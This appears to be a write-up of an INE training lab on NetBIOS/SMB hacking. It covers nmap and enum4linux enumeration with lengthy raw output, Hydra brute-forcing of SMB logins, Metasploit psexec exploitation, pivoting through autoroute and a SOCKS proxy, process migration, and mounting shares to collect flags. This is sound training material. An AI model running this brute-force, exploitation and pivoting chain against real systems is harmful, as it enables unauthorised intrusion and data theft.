NetBIOS Hacking
Welcome N1NJ10 in new writeup from Netbios Hacking lab
we will learn to enumerate the SMB service and exploit it using different brute-forcing and exploitation tools. Also, it covers pivoting and how to leverage net utility to mount the shared drives in the pivot network.
Lab Environment
In this lab environment, the user will access a Kali GUI instance. A vulnerable SMB service can be accessed using the tools installed on Kali on http://demo.ineee.local and http://demo1.ineee.local
Objective: Exploit both the target and find the flag!
Tools
The best tools for this lab are:
- Metasploit Framework
- Nmap
- Hydra
- Proxychains
If you don’t know what is Netbios , I advise you to read this article to understand what is Netbios and How do we deal with this protocol
Let’s start
AS we see we have 2 targets http://demo.ine.local and http://demo1.ine.local can we reach them or not
Well we can reach one http://demo.ine.local and only solve the IP address to the other one http://demo1.ine.local
Let’s focus on the first one that we can reach
Nmap is a good way to start
nmap -Pn -p- -T4 --disable-arp-ping -n -sV -sT 10.5.25.62
We can see that 139,445 ports are open , Good news now we know that this machine run Netbios , SMB
Let’s enumerate Netbios credentials with enum4linux
enum4linux -a demo.ine.local
we can see the following result :
root@INE:~# enum4linux -a demo.ine.local
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 23 01:41:48 2023
==========================
| Target Information |
==========================
Target ........... demo.ine.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on demo.ine.local |
======================================================
[E] Can't find workgroup/domain
==============================================
| Nbtstat Information for demo.ine.local |
==============================================
Looking up status of 10.5.25.62
No reply from 10.5.25.62
=======================================
| Session Check on demo.ine.local |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server demo.ine.local allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
=============================================
| Getting domain SID for demo.ine.local |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
result was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on demo.ine.local |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for demo.ine.local from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for demo.ine.local from srvinfo:
DEMO.INE.LOCAL Wk Sv NT SNT
platform_id : 500
os version : 6.3
server type : 0x9003
===============================
| Users on demo.ine.local |
===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x1 RID: 0x3f1 acb: 0x00000210 Account: admin Name: (null) Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x4 RID: 0x3f2 acb: 0x00000210 Account: root Name: (null) Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[admin] rid:[0x3f1]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[root] rid:[0x3f2]
===========================================
| Share Enumeration on demo.ine.local |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
do_connect: Connection to demo.ine.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
Downloads Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
Public Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on demo.ine.local
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/ADMIN$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/C$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Documents Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Downloads Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/IPC$ Mapping: OK Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/print$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Public Mapping: DENIED, Listing: N/A
======================================================
| Password Policy Information for demo.ine.local |
======================================================
[+] Attaching to demo.ine.local using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:DEMO.INE.LOCAL)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] ATTACKDEFENSE
[+] Builtin
[+] Password Info for Domain: ATTACKDEFENSE
[+] Minimum password length: None
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
================================
| Groups on demo.ine.local |
================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
group:[Access Control Assistance Operators] rid:[0x243]
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[Cryptographic Operators] rid:[0x239]
group:[Distributed COM Users] rid:[0x232]
group:[Event Log Readers] rid:[0x23d]
group:[Guests] rid:[0x222]
group:[Hyper-V Administrators] rid:[0x242]
group:[IIS_IUSRS] rid:[0x238]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Log Users] rid:[0x22f]
group:[Performance Monitor Users] rid:[0x22e]
group:[Power Users] rid:[0x223]
group:[Print Operators] rid:[0x226]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[Remote Desktop Users] rid:[0x22b]
group:[Remote Management Users] rid:[0x244]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Log Users' (RID: 559) has member: Could not connect to server 10.5.25.62
Group 'Performance Log Users' (RID: 559) has member: The username or password was not correct.
Group 'Performance Log Users' (RID: 559) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Event Log Readers' (RID: 573) has member: Could not connect to server 10.5.25.62
Group 'Event Log Readers' (RID: 573) has member: The username or password was not correct.
Group 'Event Log Readers' (RID: 573) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Access Control Assistance Operators' (RID: 579) has member: Could not connect to server 10.5.25.62
Group 'Access Control Assistance Operators' (RID: 579) has member: The username or password was not correct.
Group 'Access Control Assistance Operators' (RID: 579) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Replicator' (RID: 552) has member: Could not connect to server 10.5.25.62
Group 'Replicator' (RID: 552) has member: The username or password was not correct.
Group 'Replicator' (RID: 552) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Backup Operators' (RID: 551) has member: Could not connect to server 10.5.25.62
Group 'Backup Operators' (RID: 551) has member: The username or password was not correct.
Group 'Backup Operators' (RID: 551) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Remote Access Servers' (RID: 575) has member: Could not connect to server 10.5.25.62
Group 'RDS Remote Access Servers' (RID: 575) has member: The username or password was not correct.
Group 'RDS Remote Access Servers' (RID: 575) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Network Configuration Operators' (RID: 556) has member: Could not connect to server 10.5.25.62
Group 'Network Configuration Operators' (RID: 556) has member: The username or password was not correct.
Group 'Network Configuration Operators' (RID: 556) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Power Users' (RID: 547) has member: Could not connect to server 10.5.25.62
Group 'Power Users' (RID: 547) has member: The username or password was not correct.
Group 'Power Users' (RID: 547) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Hyper-V Administrators' (RID: 578) has member: Could not connect to server 10.5.25.62
Group 'Hyper-V Administrators' (RID: 578) has member: The username or password was not correct.
Group 'Hyper-V Administrators' (RID: 578) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Users' (RID: 545) has member: Could not connect to server 10.5.25.62
Group 'Users' (RID: 545) has member: The username or password was not correct.
Group 'Users' (RID: 545) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'IIS_IUSRS' (RID: 568) has member: Could not connect to server 10.5.25.62
Group 'IIS_IUSRS' (RID: 568) has member: The username or password was not correct.
Group 'IIS_IUSRS' (RID: 568) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Desktop Users' (RID: 555) has member: Could not connect to server 10.5.25.62
Group 'Remote Desktop Users' (RID: 555) has member: The username or password was not correct.
Group 'Remote Desktop Users' (RID: 555) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Endpoint Servers' (RID: 576) has member: Could not connect to server 10.5.25.62
Group 'RDS Endpoint Servers' (RID: 576) has member: The username or password was not correct.
Group 'RDS Endpoint Servers' (RID: 576) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Guests' (RID: 546) has member: Could not connect to server 10.5.25.62
Group 'Guests' (RID: 546) has member: The username or password was not correct.
Group 'Guests' (RID: 546) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Management Servers' (RID: 577) has member: Could not connect to server 10.5.25.62
Group 'RDS Management Servers' (RID: 577) has member: The username or password was not correct.
Group 'RDS Management Servers' (RID: 577) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Distributed COM Users' (RID: 562) has member: Could not connect to server 10.5.25.62
Group 'Distributed COM Users' (RID: 562) has member: The username or password was not correct.
Group 'Distributed COM Users' (RID: 562) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Cryptographic Operators' (RID: 569) has member: Could not connect to server 10.5.25.62
Group 'Cryptographic Operators' (RID: 569) has member: The username or password was not correct.
Group 'Cryptographic Operators' (RID: 569) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Could not connect to server 10.5.25.62
Group 'Certificate Service DCOM Access' (RID: 574) has member: The username or password was not correct.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Print Operators' (RID: 550) has member: Could not connect to server 10.5.25.62
Group 'Print Operators' (RID: 550) has member: The username or password was not correct.
Group 'Print Operators' (RID: 550) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Administrators' (RID: 544) has member: Could not connect to server 10.5.25.62
Group 'Administrators' (RID: 544) has member: The username or password was not correct.
Group 'Administrators' (RID: 544) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Management Users' (RID: 580) has member: Could not connect to server 10.5.25.62
Group 'Remote Management Users' (RID: 580) has member: The username or password was not correct.
Group 'Remote Management Users' (RID: 580) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Monitor Users' (RID: 558) has member: Could not connect to server 10.5.25.62
Group 'Performance Monitor Users' (RID: 558) has member: The username or password was not correct.
Group 'Performance Monitor Users' (RID: 558) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
group:[WinRMRemoteWMIUsers__] rid:[0x3e8]
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Could not connect to server 10.5.25.62
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: The username or password was not correct.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
group:[None] rid:[0x201]
[+] Getting domain group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'None' (RID: 513) has member: Could not connect to server 10.5.25.62
Group 'None' (RID: 513) has member: The username or password was not correct.
Group 'None' (RID: 513) has member: Connection failed: NT_STATUS_LOGON_FAILURE
=========================================================================
| Users on demo.ine.local via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.
===============================================
| Getting printer info for demo.ine.local |
===============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Apr 23 01:42:11 2023
root@INE:~#
From the previous result we can see we have users [ Administrator , Guest , Root , Admin ] we may have null session here cuz we can login with no credentials and have IPC$ dir
Note : if you don’t know what is null session and what is IPC$ look here for more detailed
Let’s test this with smbclient tool
smbclient -L 10.5.30.121 < demo.ine.local >
Note : the machine crashed many times so the IP may change in some command also
Pingo we have null session in there we only need a valid credantials to use psexec exploit to get C2 over the machine
So we have usernames from enum4linux we can brute force with them , you can use NSE from Nmap or any other method but i prefer hydra for this tasks
hydra -L Users.txt -p < ANY_PASSWORD_LIST > smb://demo.ine.local
Pingo , we now have the administrator account
Now we can run psexec module
Give it a run !!
Pingo , Now we are in !!
But we not end until now , We just start in the second task
we can’t access demo1.ine.local from our machine , Let’s see if we can access it from this victim machine
Note : we can’t ping with the name cuz this machine disable resolve with DNS so i know the IP from the first ping i do in the above
So this machine have another NIC with private IP lan we can’t access let’s see with ipconfig
ipconfig
eth0 ( Interface 12 ) is the NIC we wanna to access so we can add this route with autoroute module from metasploit
run autoruote -s 10.5.27.211/20
Note : why i use /20 prefix cuz the netmask is 255.255.240.0 for mor info here
Now we add access this network from metasploit only but i want to access it from my normal terminal
So i used SOCKS_PROXY server module from metasploit
Note : You must know what is your default socks proxychanins tor port , you can know it with this command
tail -n 5 ../../etc/proxychains4.conf
Now we ready to start the SOCKS_PROXY server module
Good now we can do whatever we want from our machine to the deme1.ine.local throw the proxy server
Let’s scan it
proxychains nmap -sT -Pn -sV --disable-arp-ping -T4 -n demo1.ine.local
It have 445 port open will that mean it have Netbios too
Now this is the time to grep our flags
I start search for the first flag in the first vicitm machine ( demo.ine.local ) i found it in Documents dir
Let’s see what is in the secound one with net view command
net view 10.5.27.211
We have received the Access is denied however we are the root this means we probably should migrate
So i decided to migrate to explorer.exe operation
Note : if you don’t know what is Migrate process or why i choose explorer.exe or what is it read this
migrate -N explorer.exe
Let’s see if we can use net view
We can use net view commad , Now we have Documents , K dir , let’s see what disks exist in this machine with
diskpart
list disk
Ok we have one disk with the naem Disk0 we can get the 2 dir’s from the Netbios
net use dir_name : \\<IP>\\dir_you_want_to_download
Now we have them , I found the secound flag in D dir ( Documents )
I enjoyed the lab , and would post more future labs and other security stuff in the future.